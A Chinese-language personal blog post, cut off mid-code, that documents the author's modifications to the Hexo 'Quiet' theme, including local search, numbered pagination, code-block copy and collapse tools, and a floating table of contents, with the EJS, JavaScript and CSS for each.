    門裏站着一個人? {% hideInline 閃 %}


Block

block hides a standalone block of content; it can hide a lot, including images, code blocks, and so on.

(the display text must not contain an English comma; use &sbquo; instead)

    {% hideBlock 查看答案 %}
    傻子,怎麼可能有答案
    {% endhideBlock %}


Toggle

If there is too much content to show, tuck it into a collapsible box and expand it when needed.

(the display text must not contain an English comma; use &sbquo; instead)

    {% hideToggle Butterfly 安裝方法 %}
    在你的博客根目錄裏

    git clone -b master https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

    如果想要安裝比較新的 dev 分支,可以

    git clone -b dev https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

    {% endhideToggle %}

CSS and LESS

Some browsers don't seem to support some of the syntax used in the CSS files; switching to LESS works!

(screenshot)

Inject

Introduction

Ported from: Butterfly 安裝文檔(四) 主題配置-2 | Butterfly

To add extra js/css/meta and the like, add it under Inject; both head (inserted before the </head> tag) and bottom (before the </body> tag) are supported.

Note: add the content as standard html.

    inject:
    head:
    - <link rel="stylesheet" href="/self.css">
    bottom:
    - <script src="xxxx"></script>

This also sidesteps the problem of some JS getting wrecked by the encryption plugin. Great!

Implementation

Add to post_head.ejs:

    <% if(page.inject) { %>
    <% if(page.inject.head) { %>
    <% for(let i = 0; i < page.inject.head.length; i++){ %>
    <%- page.inject.head[i] %>
    <% } %>
    <% } %>
<% } %>

Add to footer.ejs:

    <% if(page.inject) { %>
    <% if(page.inject.bottom) { %>
    <% for(let i = 0; i < page.inject.bottom.length; i++){ %>
    <%- page.inject.bottom[i] %>
    <% } %>
    <% } %>
    <% } %>

Collapsible TOC 2024/11/11

The TOC can finally fold up like butterfly and other themes! To disable the collapsible TOC, set this in the post's front matter:

    toc_collapsed: false

Miscellaneous

• A few css tweaks aren't shown here; I adjusted things to my own taste.
• Thanks to my own interest and ChatGPT's considerable power, I could write a lot of this code without ever studying frontend systematically. Quite the rabbit hole!
• The original theme still has a few build errors; I'll fix them when I get the chance.
• All the colors really should live in variables, or this stays a pile of hacks.
• It reminds me of the spaghetti a colleague wrote back when I was interning; I've done my best to keep this code reasonably clean...
    ]]>
    + 前言

    ​ 这个 Quiet 主题的布局个人是很喜欢的,风格简洁且小众。可惜它相比于主流的 NexTButterflyFluid 等的功能还是太少了😇,于是决定魔改一下它。

    ​ 这篇博客记录了给这个主题添加的各种功能。

    正文

    站内搜索

    ​ 博客里 bb 了太多东西,考虑加一个站内搜索方便检索一下之前的文章。

    ​ 安装完 hexo-generator-search 插件后,hexo g 就会在 public 文件夹下创建 ./search.xml,这会把所有博客的文章内容整合进去。

    png

    后端(算是吧)

    ​ 接下来就是靠 JS 如何检索文章。Butterfly 已经有自带检索文章的功能了,研究了一会儿没研究出怎么把代码偷下来……找到了一个从零配置搜索功能的文章:

    ​ 核心就是下面这个 search.js 了,魔改一下:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    // search.js
    // A local search script with the help of hexo-generator-search
    // Copyright (C) 2015
    // Joseph Pan <http://github.com/wzpan>
    // Shuhao Mao <http://github.com/maoshuhao>
    // This library is free software; you can redistribute it and/or modify
    // it under the terms of the GNU Lesser General Public License as
    // published by the Free Software Foundation; either version 2.1 of the
    // License, or (at your option) any later version.
    //
    // This library is distributed in the hope that it will be useful, but
    // WITHOUT ANY WARRANTY; without even the implied warranty of
    // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
    // Lesser General Public License for more details.
    //
    // You should have received a copy of the GNU Lesser General Public
    // License along with this library; if not, write to the Free Software
    // Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
    // 02110-1301 USA

    var searchFunc = function (path, search_id, content_id, match_count_id) {
    $.ajax({
    url: path,
    dataType: "xml",
    success: function (xmlResponse) {
    // get the contents from search data
    var datas = $("entry", xmlResponse).map(function () {
    return {
    title: $("title", this).text(),
    content: $("content", this).text(),
    url: $("url", this).text()
    };
    }).get();
    var $input = document.getElementById(search_id);
    var $resultContent = document.getElementById(content_id);
    $input.addEventListener('input', function () {
    var str = '<ul class=\"search-result-list\">';
    var keywords = this.value.trim().split(/[\s\-]+/); // .toLowerCase().split(/[\s\-]+/);
    $resultContent.innerHTML = "";
    if (this.value.trim().length <= 0) {
    document.getElementById(match_count_id).textContent = "";
    return;
    }
    // perform local searching
    datas.forEach(function (data) {
    var isMatch = true;
    if (!data.title || data.title.trim() === '') {
    data.title = "Untitled";
    }
    var data_title = data.title.trim();//.toLowerCase();
    var data_content = data.content.trim().replace(/<[^>]+>/g, "");//.toLowerCase();
    var data_url = data.url;
    var index_title = -1;
    var index_content = -1;
    var first_occur = -1;
    // only match artiles with not empty contents
    if (data_content !== '') {
    keywords.forEach(function (keyword, i) {
    index_title = data_title.indexOf(keyword);
    index_content = data_content.indexOf(keyword);

    if (index_title < 0 && index_content < 0) {
    isMatch = false;
    } else {
    if (index_content < 0) {
    index_content = 0;
    }
    if (i == 0) {
    first_occur = index_content;
    }
    // content_index.push({index_content:index_content, keyword_len:keyword_len});
    }
    });
    } else {
    isMatch = false;
    }
    // show search results
    if (isMatch) {
    str += "<li><a href='" + data_url +
    "' class='search-result-title'>" + data_title + "</a>";
    var content = data.content.trim().replace(/<[^>]+>/g, "");
    if (first_occur >= 0) {
    // cut out 100 characters
    var start = first_occur - 20;
    var end = first_occur + 80;
    if (start < 0) {
    start = 0;
    }
    if (start == 0) {
    end = 100;
    }
    if (end > content.length) {
    end = content.length;
    }
    var match_content = content.substr(start, end);
    // highlight all keywords
    keywords.forEach(function (keyword) {
    var regS = new RegExp(keyword, "gi");
    match_content = match_content.replace(regS,
    "<em class=\"search-keyword\">" +
    keyword + "</em>");
    });
    str += "<p class=\"search-result\">" + match_content +
    "...</p>"
    }
    str += "</li>";
    }
    });
    str += "</ul>";
    if (str.indexOf('<li>') === -1) {
    document.getElementById(match_count_id).textContent = "";
    return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容,更换下搜索词试试吧~<span></ul>";
    }
    else
    {
    document.getElementById(match_count_id).innerHTML = "匹配到 <b><font size=\"5px\"><font color=\"#424242\">" + str.match(/<li>/g).length + "</font></font></b> 个结果。";
    }
    $resultContent.innerHTML = str;
    });
    }
    });
    }

    ​ 大致意思就是读取输入框 search_id 里的内容,从 path./search.xml)检索内容,将检索到的内容和计数分别以列表形式追加到 content_idmatch_count_id 中。

    前端

    search.ejs

    ​ OK,后端就是这样,接下来写前端 search.ejs

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    <div class="page-header">
    <div class="search-dialog">
    <span id="local-search" class="local-search local-search-plugin">
    <h2>站内搜索</h2>
    <div class="local-search-input-box">
    <img class="search_icon" src="<%- theme.icon.search %>" />
    <input type="search" placeholder="输入关键字以搜索……" id="local-search-input" class="local-search-input-cls" />
    </div>
    <div id="local-search-result" class="local-search-result-cls"></div>
    <hr></hr>
    <p id="local-search-match-count" class="local-search-match-count"></p>
    </span>
    </div>
    <script>
    if ($('.local-search').size()) {
    $.getScript('/js/search.js', function () {
    searchFunc('/search.xml', 'local-search-input', 'local-search-result', 'local-search-match-count')
    })
    }
    </script>
    </div>

    search.css

    search.css 设计一下布局:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    .page-header{
    display: flex;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    }
    .local-search {
    position: relative;
    text-align: left;
    display: grid;
    }
    .local-search-input-box {
    display: flex;
    height: 24px;
    margin: 20px 10px 0 10px;
    padding: 4px 12px;
    border-radius: 20px;
    border: 2px solid #898fa0;
    color: #666;
    font-size: 14px;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    }
    .local-search-input-cls {
    width: 100%;
    /* margin: 10px 0; */
    color: #12183A;
    font-size: 16px;
    padding-left: 0.6em;
    border: none;
    outline:none;
    }
    a.search-result-title {
    display: flow !important;
    width: auto !important;
    height: auto !important;
    margin-left: 0 !important;
    }
    .local-search-result-cls {
    overflow-y: overlay;
    max-height: calc(80vh - 200px);
    width: 100%;
    margin: 20px 0;
    }
    @media screen and (max-width: 800px) {
    .local-search-result-cls {
    margin: 20px 10px;
    }
    }
    .local-search-empty {
    color: #888;
    line-height: 44px;
    text-align: center;
    display: block;
    font-size: 18px;
    font-weight: 400;
    }
    .local-search-result-cls ul {
    min-width: 400px;
    max-width: 900px;
    max-height: 600px;
    min-height: 0;
    height: auto;
    margin: 15px 5px 15px 20px;
    padding-right: 30px;
    }
    @media screen and (max-width: 800px) {
    .local-search-result-cls ul {
    min-width: auto;
    max-width: max-content;
    max-height: 70vh;
    min-height: auto;
    padding: 0 10px 10px 10px 10px;
    }
    }
    .local-search-result-cls ul li {
    text-align: left;
    border-bottom: 1px solid #bdb7b7;
    padding-bottom: 10px;
    margin-bottom: 20px;
    line-height: 30px;
    font-weight: 400;
    }
    .local-search-result-cls ul li:last-child {
    border-bottom: none;
    margin-bottom: 0;
    }
    .local-search-result-cls ul li a {
    margin-top: 20px;
    font-size: 18px;
    text-decoration: none;
    transition: all .3s;
    font-weight: bold;
    color: #12183A;
    }
    .local-search-result-cls ul li a:hover {
    text-decoration:underline;
    }
    .local-search-result-cls ul li p {
    margin-top: 10px;
    font-size: 14px;
    max-height: 124px;
    overflow: hidden;
    }
    .local-search-result-cls ul li em.search-keyword {
    color: #00F;
    font-weight:bold;
    font-style: normal;
    }

    .search_icon{
    width: 14px;
    height: 14px;
    }
    .search-dialog {
    display: block;
    padding: 64px 80px 20px 80px;
    width: 100%;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    margin: 0 0 20px;
    }
    @media screen and (max-width: 800px) {
    .search-dialog {
    box-sizing: border-box;
    top: 0;
    left: 0;
    margin: 0;
    width: 100%;
    height: 100%;
    border-radius: 0;
    padding: 50px 15px 20px 15px;
    }
    }
    .local-search-match-count{
    padding: 20px 20px 0 20px;
    color: #12183A;
    }
    .search-dialog h2{
    display: inline-block;
    width: 100%;
    margin-bottom: 20px;
    color: #424242;
    font-size: 1.7rem;
    }
    .search-close-button:hover {
    filter: brightness(120%);
    }
    #local-search .search-dialog .local-search-box {
    margin: 0 auto;
    max-width: 100%;
    width: 100%;
    }
    .custom-hr, .search-dialog hr {
    position: relative;
    margin: 0 auto;
    border: 1px dashed #bdb7b7;
    width: calc(100% - 4px);
    }
    input[type="search"]::-webkit-search-cancel-button {
    -webkit-appearance: none;
    height: 10px;
    width: 10px;
    background: url(/images/close.png) no-repeat;
    background-size: contain;
    }
    input[type="search"]::-webkit-search-cancel-button:hover {
    filter: brightness(120%);
    }

Deployment

Import the CSS in index.less:

@import "./plugin/search.css";

​ I dropped this search module onto the statistics page, just above the grouping section; it looks decent. A theme switch then controls whether the feature is enabled.

    <% if(theme.search && is_archive()) { %>
    <%- partial('_widget/search') %>
    <% } %>

Demo

​ Locally the results are instant; the deployed site is rather laggy, and mashing random input can even crash it. Emmm, it failed to load at all on my phone... I really have rambled too much on this blog.

png

Improved pagination

​ The theme only offers "previous" and "next" links. Flipping one page at a time is far too slow for a blog that has rambled on for 28 pages by now, so let's fix that.

Methodology

​ When rendering, Hexo paginates the blog according to the number of posts. Check the API: 变量 | Hexo

Variable            Description                                                          Type
page.per_page       Number of posts displayed per page                                   number
page.total          Total number of pages                                                number
page.current        Current page number                                                  number
page.current_url    URL of the current page                                              string
page.posts          Posts on this page (Data Model)                                      object
page.prev           Previous page number; 0 if this is the first page                    number
page.prev_link      URL of the previous page; '' if this is the first page               string
page.next           Next page number; 0 if this is the last page                         number
page.next_link      URL of the next page; '' if this is the last page                    string
page.path           Path of the current page (without the root); themes usually use url_for(page.path)   string

​ For the home page (index), page.prev_link and page.next_link are available, so "previous" and "next" are easy to implement.

​ But jumping to any other page needs the other variables.

​ Observe the site's URLs: apart from page 1, which lives at /, every page lives at /page/X.

​ So page.current and page.total are enough to write the full pagination logic; a theme variable pagination controls how many page numbers to show on each side of the current one.
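​ To make the window logic concrete, here is a plain-JS sketch of the core windowing that the EJS below implements (arrow links omitted; the function name pageLabels is mine, not part of the theme):

function pageLabels(current, total, pagination) {
    const labels = [];
    if (current > pagination + 1) labels.push(1, '...');         // leading "1 ..."
    for (let i = current - pagination; i <= current + pagination; i++) {
        if (i >= 1 && i <= total) labels.push(i);                // the window around the current page
    }
    if (total - current > pagination) labels.push('...', total); // trailing "... N"
    return labels;
}
// pageLabels(7, 28, 2) -> [1, '...', 5, 6, 7, 8, 9, '...', 28]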

Code

home.ejs

​ Modify home.ejs:

    <div class="change-page">
    <div class="change-page">
    <% if(page.prev !==0 && theme.pagination !== 1){ // 前一页 %>
    <div class="page">
    <a href="<%- url_for(page.prev_link) %>">
    <div class="box">
    &#60;
    </div>
    </a>
    </div>
    <% } %>
    <% if (page.current > theme.pagination + 1) { %>
    <div class="page">
    <a href="<%- url_for('/') %>">
    <div class="box">1
    </div>
    </a>
    </div>
    <div class="page">
    <div class="ellipsis">
    <div class="box">...</div>
    </div>
    </div>
    <% } %>
    <% for(var i = page.current - theme.pagination; i <= page.current + theme.pagination; i++){ %>
    <% if(i >= 1 && i <= page.total){ %>
    <% if(i === page.current){ %>
    <div class="page">
    <div class="box">
    <%= i %>
    </div>
    </div>
    <% } else { %>
    <div class="page">
    <a href="<%- i=== 1 ? '/' : url_for('/page/' + i + '/') %>">
    <div class="box">
    <%= i %>
    </div>
    </a>
    </div>
    <% } %>
    <% } %>
    <% } %>
    <% if (page.total - page.current > theme.pagination) { %>
    <div class="page">
    <div class="ellipsis">
    <div class="box">...</div>
    </div>
    </div>
    <div class="page">
    <a href="<%- page.total === 1 ? '/' : url_for('/page/' + page.total + '/') %> %>">
    <div class="box">
    <%= page.total %>
    </div>
    </a>
    </div>
    <% } %>
    <% if(page.next !==0 && theme.pagination !== 1){ %>
    <div class="page">
    <a href="<%- url_for(page.next_link) %>">
    <div class="box">
    &#62;
    </div>
    </a>
    </div>
    <% } %>
    </div>
    </div>

home.less

​ Then adjust home.less:

    .change-page {
    display: inline;
    color: #FFF;
    .box {
    background: #006AFF;
    width: 40px;
    height: 40px;
    line-height: 40px;
    border-radius: 10px;
    margin: 8px;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.1);
    }
    .ellipsis
    {
    .box {
    background: #fff;
    color: #898FA0;
    }
    }
    .page {
    display: inline-block;
    a {
    color: @textColorTheme;
    text-decoration: none;
    .box {
    background: #fff;
    color: #898FA0;
    }
    .box:hover {
    margin-top: -15px;
    cursor: pointer;
    }
    }
    }
    }

Demo

png

​ Pagination can now jump not only to the previous and next pages but also to the first page, the last page, and the surrounding pages, with an ellipsis whenever the surrounding pages are not contiguous with the first or last.

Showing the description on the home page

​ Display each post's description on the home page, to give a better preview of what the post is rambling about.

​ For encrypted posts, post.excerpt always shows "这里有东西被加密了,需要输入密码查看哦。", presumably because hexo-blog-encrypt forcibly overwrites post.excerpt. The workaround I settled on is to use a different field, so following Butterfly's convention I switched the key to description.

Code

home.ejs

​ In home.ejs, find post-block-content-info and add code that displays post.description:

    <span class="post-block-content-info-description">
    <%= post.description %>
    </span>

home.less

​ Adjust the style in home.less:

    .post-card-description {
    padding: 10px 16px;
    text-align: right;
    flex-grow: 1;
    font-size: 14px;
    font-weight: 500;
    line-height: 36px;
    color: #999;
    }

Demo

​ Final demo:

png

Code block helpers

​ For long, unwieldy code, add three practical features: a copy button, a language label, and a collapse toggle. (Borrowed from Butterfly.)

Methodology

​ When this theme renders a Markdown code block, it produces the structure shown in the figure below:

    png

Code

highlight_tools.ejs

highlight_tools.ejs grabs the <pre> elements and hands them, together with the relevant parameters, to highlight_tools.js:

This way of writing it feels a bit unidiomatic; it will do for now!

    <%- js('js/widget/highlight_tools.js') %>
    <script>
    var codeBlocks = document.querySelectorAll('pre');
createHighlightTools(codeBlocks, "<%= theme.icon.copy %>", "<%= theme.icon.close_code_block %>", "<%= page.highlight_shrink %>", "<%= page.highlight_height_limit %>"); // call the function with the theme/page parameters
    </script>

    highlight_tools.js

    function createHighlightTools()
    function createHighlightTools(codeBlocks, copyIcon, closeCodeBlockIcon, highlightShrink, HighlightHeightLimit) {
    codeBlocks.forEach(function (codeBlock) {
    if (!codeBlock.querySelector('code'))
    return;
    var container = createContainer(codeBlock);
    createCopyButton(container, codeBlock, copyIcon);
    createCodeLangText(container, codeBlock);
    createCloseCodeBlockButton(container, codeBlock, closeCodeBlockIcon, highlightShrink);
    setHighlightHeightLimit(codeBlock, HighlightHeightLimit);
    });
    }

​ First check that the <pre> actually has a <code> child, to avoid false positives.

• createContainer() wraps a layer around the top of the code block to hold the UI.

​ Then implement the three features in turn:

• createCopyButton(): the copy button
• createCodeLangText(): the language label
• createCloseCodeBlockButton(): the collapse toggle
    function createContainer()
    function createContainer(codeBlock) {
// create a container element that wraps the code block and its buttons
    var container = document.createElement('div');
    container.className = 'hightlight-tools';
// insert the container just before the code block
    codeBlock.parentNode.insertBefore(container, codeBlock);
    return container;
    }

​ This adds a <div class="hightlight-tools"> above the code block:

    png

    function createCopyButton()

​ Most snippets I found wanted me to pull in something called clipboard.js, which only threw errors once downloaded, so I found an approach that needs no plugin:

function createCopyButton(container, codeBlock, icon) {
var button = document.createElement('button');
button.className = 'copy-button';
button.type = 'button';
button.title = 'copy-button';
button.style.backgroundImage = 'url("' + icon + '")';
// add the button to the container
container.appendChild(button);
// create the "copied" notice as a <span>
var span = document.createElement('span');
span.textContent = "已复制";
// add a class name
span.className = 'copy-notice';
// add the notice to the container
container.appendChild(span);

button.addEventListener('click', function () {
// grab the code block's text, line breaks included
var code = codeBlock.innerText;
// create a temporary textarea holding the code
var textarea = document.createElement('textarea');
textarea.value = code;
// append the textarea to the body
document.body.appendChild(textarea);
// select its text
textarea.select();
// run the copy command
document.execCommand('copy');
// remove the temporary textarea
document.body.removeChild(textarea);
// show the "copied" notice
span.style.opacity = 1;
// after 1 second, fade the notice back out
setTimeout(function () {
span.style.opacity = 0;
}, 1000);
});
}

​ The original fetched the content with var code = codeBlock.textContent;, which throws away line breaks; it should be var code = codeBlock.innerText;.

​ A "已复制" (copied) notice is also added.
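​ As an aside, the asynchronous Clipboard API can replace the deprecated document.execCommand('copy') path; a sketch reusing the button, codeBlock and span from the function above (requires a secure context, i.e. HTTPS or localhost):

button.addEventListener('click', function () {
    navigator.clipboard.writeText(codeBlock.innerText).then(function () {
        span.style.opacity = 1;                                   // show the "copied" notice
        setTimeout(function () { span.style.opacity = 0; }, 1000);
    }).catch(function (err) {
        console.error('copy failed:', err);                       // e.g. insecure context
    });
});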

    function createCodeLangText()
function createCodeLangText(container, codeBlock) {
// create the language label as a <span>
var span = document.createElement('span');
span.textContent = codeBlock.querySelector('.hljs').classList.value.replace('hljs ', '').toUpperCase(); // the code language
if (span.textContent === 'EBNF')
span.textContent = '';
// add a class name
span.className = 'code-lang';
// add the label to the container
container.appendChild(span);
}

​ The other class on the hljs element is the language name. When the Markdown block declares no language it gets rendered with the ebnf class, so that one is replaced with an empty string.

    function createCloseCodeBlockButton()
    function createCloseCodeBlockButton(container, codeBlock, icon, highlight_shrink)
    {
    var button = document.createElement('button');
    button.className = 'close-code-block-button';
    button.type = 'button';
    button.title = 'close-code-block-button';
    button.style.backgroundImage = 'url("' + icon + '")';
// add the button to the container
    container.appendChild(button);
    if(Boolean(highlight_shrink))
    {
    var hljs = codeBlock.querySelector('.hljs');
    button.style.transform = "rotate(-90deg)";
    hljs.classList.add("closed");
    }
    button.addEventListener('click', function () {
    var hljs = codeBlock.querySelector('.hljs');
    if (!hljs.classList.contains('closed')) {
    button.style.transform = "rotate(-90deg)";
    hljs.classList.add("closed");
    }else{
    button.style.transform = "rotate(0deg)";
    hljs.classList.remove("closed");
    }
    });
    }

​ Grab the hljs element and toggle a closed class on it; CSS takes care of the rest.

​ Posts get a new highlight_shrink parameter; when it is true, code blocks start out collapsed.

    function setHighlightHeightLimit()
    function setHighlightHeightLimit(codeBlock, HighlightHeightLimit)
    {
// cap the height of the code block
    if (HighlightHeightLimit != "")
    {
    var hljs = codeBlock.querySelector('.hljs');
    hljs.style.maxHeight = HighlightHeightLimit;
    }
    }

​ Caps the height of a code block; the value comes from page.highlight_height_limit.

    highlight_tools.css

    .hightlight-tools {
    background: #e6ebf1;
    position: relative;
    height: 32px;

    .copy-notice {
    font-weight: 500;
    position: absolute;
    right: 30px;
    font-size: 14px;
    opacity: 0;
    transition: opacity 0.4s;
    color: #b3b3b3;
    -webkit-user-select: none; /* Safari */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* IE 10+ */
    user-select: none;
    }

    .copy-button {
    position: absolute;
    width: 18px;
    height: 18px;
    right: 6px;
    border: none;
    background-color: rgba(0, 0, 0, 0);
    background-size: cover;
    top: 50%;
    transform: translateY(-50%);
    }

    .copy-button:hover
    {
    filter: brightness(120%);
    }

    .code-lang {
    font-weight: bold;
    position: absolute;
    left: 30px;
    font-size: 16px;
    color: #b3b3b3;
    }

    .close-code-block-button {
    position: absolute;
    width: 16px;
    height: 16px;
    bottom: 8px;
    left: 6px;
    border: none;
    background-color: rgba(0, 0, 0, 0);
    background-size: cover;
    transition: transform 0.4s;
    }
    }

    pre {
    .closed {
    height: 0;
    padding: 0 !important;
    overflow-y: hidden;
    }
    }

Right sidebar and TOC

​ The theme ships with a toc feature based on Hexo's built-in toc helper, but it comes with no layout at all... so I had never used it.

​ I had been using the hexo-toc plugin instead, but it can only sit inside one big chunk of the article and does not follow along as you read; not a great experience.

​ So: redesign the TOC, place it to the right of the article, and make it follow in real time.

​ The hexo-toc plugin conflicts with the built-in toc; uninstall it:

    npm uninstall hexo-toc

Methodology

​ See the default toc helper: 辅助函数(Helpers)| Hexo

​ A single <%- toc(page.content,{list_number:false}) %> call spits out the whole TOC:

png

​ Hexo's built-in toc gives every heading an ID equal to the heading text and generates a #XXX link so the heading can be jumped to.

​ Characters that would be ambiguous in a URL are replaced by - (hexo-toc deletes such characters instead, which I suspect is exactly why the plugin conflicts with the default toc).

​ Duplicate headings get a -X suffix to tell them apart.

​ The built-in toc seems buggy, though: for some heading structures it fails to put every <li> inside <ol class="toc-child">, and it falls apart completely the moment hexo-blog-encrypt is involved, so I decided to rewrite the TOC-building logic around the structure it generates by default.

Code

rightside.ejs

​ For now the theme's original goTop.ejs is replaced by a sidebar, rightside.ejs:

• hidden keeps the TOC and its button hidden; it exists because of the encryption plugin.
• toc.js holds the TOC-building logic.
    <%- js('js/goto_position.js') %>
    <style>
    .rightside-button-icon
    {
    width: 18px;
    height: 18px;
    -webkit-user-select: none; /* Chrome, Safari, Opera */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* Internet Explorer/Edge */
    user-select: none; /* Non-prefixed version, supported by most modern browsers */
    }
    </style>

    <div style="z-index: 3; position: fixed; bottom: 10px; right: 20px; transition: all 0.5s ease-out;" id="rightside">
    <% if(page.toc) { %>
    <div class="post-toc hidden" id="post-toc">
    <span class="post-toc-title">导航</span>
    <ol class="toc"></ol>
    </div>
    <div class="rightside-button hidden" id="js-toc">
    <span>
    <img src="<%- theme.icon.toc %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    <%- js('js/toc.js');%>
    <script>
    initToc();
    </script>
    <% } %>
    <div class="rightside-button" id="js-go_top">
    <span>
    <img src="<%- theme.icon.go_top %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    <div class="rightside-button" id="js-go_bottom">
    <span>
    <img src="<%- theme.icon.go_bottom %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    </div>

    <script>
    $('#js-go_top')
    .gotoPosition( {
    speed: 300,
    target: 'top',
    } );
    $('#js-go_bottom')
    .gotoPosition( {
    speed: 300,
    target: 'bottom',
    } );
    </script>

goto_position.js

​ Hacked the original goTop.js so it can scroll to the bottom as well:

    (function ($) {
    jQuery.fn.gotoPosition = function (opt) {
    var ele = this;
    var win = $(window);
    var doc = $("html,body");
    var defaultOpt = {
    speed: 500,
    iconSpeed: 200,
    animationShow: {
    opacity: "1",
    },
    animationHide: {
    opacity: "0",
    },
    };
    var options = $.extend(defaultOpt, opt);

    ele.click(function () {
    var targetOffset = 0;
    if (opt && opt.target) {
    if (opt.target === "top") {
targetOffset = 0; // jump to the top of the document
    } else if (opt.target === "bottom") {
targetOffset = $(document).height() - win.height(); // jump to the bottom of the document
    }
    }
    doc.animate(
    {
scrollTop: targetOffset, // scroll the document to the target position
    },
    options.speed
    );
    });
    };
    })(jQuery);

toc.js

function initToc()

​ Initialize the TOC: if the post is not encrypted (i.e. no element with the classes hbe hbe-content exists), remove the TOC's hidden class.

​ Following Butterfly, localStorage decides whether the TOC is shown by default.

function initToc() {
// check for an element with the classes 'hbe' and 'hbe-content'
if ($('.hbe.hbe-content').length > 0) {
// still encrypted: add 'hidden' to '.rightside-button' and '.post-toc'
$('.rightside-button, .post-toc').addClass('hidden');
return;
} else {
// remove 'hidden' from the .rightside-button elements
$('.rightside-button').removeClass('hidden');
// remove 'hidden' from the .post-toc element
$('.post-toc').removeClass('hidden');
}

var value = localStorage.getItem('aside-status');
if (value === null) { // create the entry if it does not exist yet
localStorage.setItem('aside-status', "true");
value = "true"; // keep it a string so the comparison below matches on first visit
}
if (value === "true") {
$("#post-toc").addClass("show-toc");
$("#content").addClass("show-toc");
}
createToc();
}
createToc()

​ Build the TOC:

• keep appending entries into <ol class="toc-child"> elements
• clicking a TOC entry scrolls smoothly to the matching position.
function createToc() {
var toc = $('.toc');
toc.empty();

var headings = $('#content').find('h1, h2, h3, h4, h5, h6');
var currentLevel = 1;
var currentList = toc;

for (var i = 0; i < headings.length; i++) {
var heading = $(headings[i]);
// an ID must not start with a digit; if it does, prefix an underscore
if (/^[0-9]/.test(heading.attr('id'))) {
heading.attr('id', '_' + heading.attr('id'));
}
if (!heading.find('a').length) // no <a> inside: probably a user-made heading, skip it
continue;
var level = parseInt(heading.prop('tagName').charAt(1));
// build the nested lists
if (level > currentLevel) {
for (var j = currentLevel + 1; j <= level; j++) {
var newOl = $('<ol>').addClass('toc-child');
var newLi = $('<li>').addClass('toc-item toc-level-level-' + j);
currentList.append(newLi);
newLi.append(newOl);
currentList = newOl;
}
} else if (level < currentLevel) {
for (var j = level; j < currentLevel; j++) {
currentList = currentList.parent().parent();
}
}
var li = $('<li>').addClass('toc-item toc-level-level-' + level);
// extract hrefValue
var hrefValue = heading.html().match(/href="([^"]+)"/) ? heading.html().match(/href="([^"]+)"/)[1] : '';
// an ID must not start with a digit; if it does, prefix an underscore
if (!isNaN(parseInt(hrefValue.charAt(1)))) {
hrefValue = hrefValue.slice(0, 1) + "_" + hrefValue.slice(1);
}
// extract titleValue
var titleValue = heading.html().match(/title="([^"]+)"/) ? heading.html().match(/title="([^"]+)"/)[1] : '';
// build the <a>
li.html('<a class="toc-link" href="' + hrefValue + '"><span class="toc-text">' + titleValue + '</span></a>');
var a = li.find("a");
// override the jump behaviour when a TOC entry is clicked
a.on("click", function (event) {
event.preventDefault();
var element = $($(this).attr("href"));
var rect = element[0].getBoundingClientRect();
var topOffset = rect.top + window.scrollY - 90; // -90 to account for the fixed top bar
window.scrollTo({
top: topOffset,
behavior: "smooth"
});
});
currentList.append(li);
currentLevel = level;
}
}
$("#js-toc").click()

​ Clicking the button toggles whether the TOC is shown.

    $("#js-toc").click(function () {
    var postToc = $("#post-toc");
    var content = $("#content");
    if (!postToc.hasClass("show-toc")) {
    localStorage.setItem('aside-status', true);
    content.addClass("show-toc");
    postToc.addClass("show-toc");
    } else {
    content.removeClass("show-toc");
    postToc.removeClass("show-toc");
    localStorage.setItem('aside-status', false);
    }
    });

​ It just toggles a show-toc class; LESS handles the rest.

function getTopHeadingId()

​ Gets the id of the heading currently nearest the top of the viewport; the -90 offset accounts for the theme's fixed top bar:

    function getTopHeadingId() {
    const headings = document.querySelector('#content').querySelectorAll('h1, h2, h3, h4, h5, h6');
    let topHeadingId = null;
    let minDistanceFromTop = Infinity;
    for (const heading of headings) {
    const boundingRect = heading.getBoundingClientRect();
    const distanceFromTop = Math.abs(boundingRect.y - 90);
    if (distanceFromTop < minDistanceFromTop) {
    minDistanceFromTop = distanceFromTop;
    topHeadingId = heading.id;
    }
    }
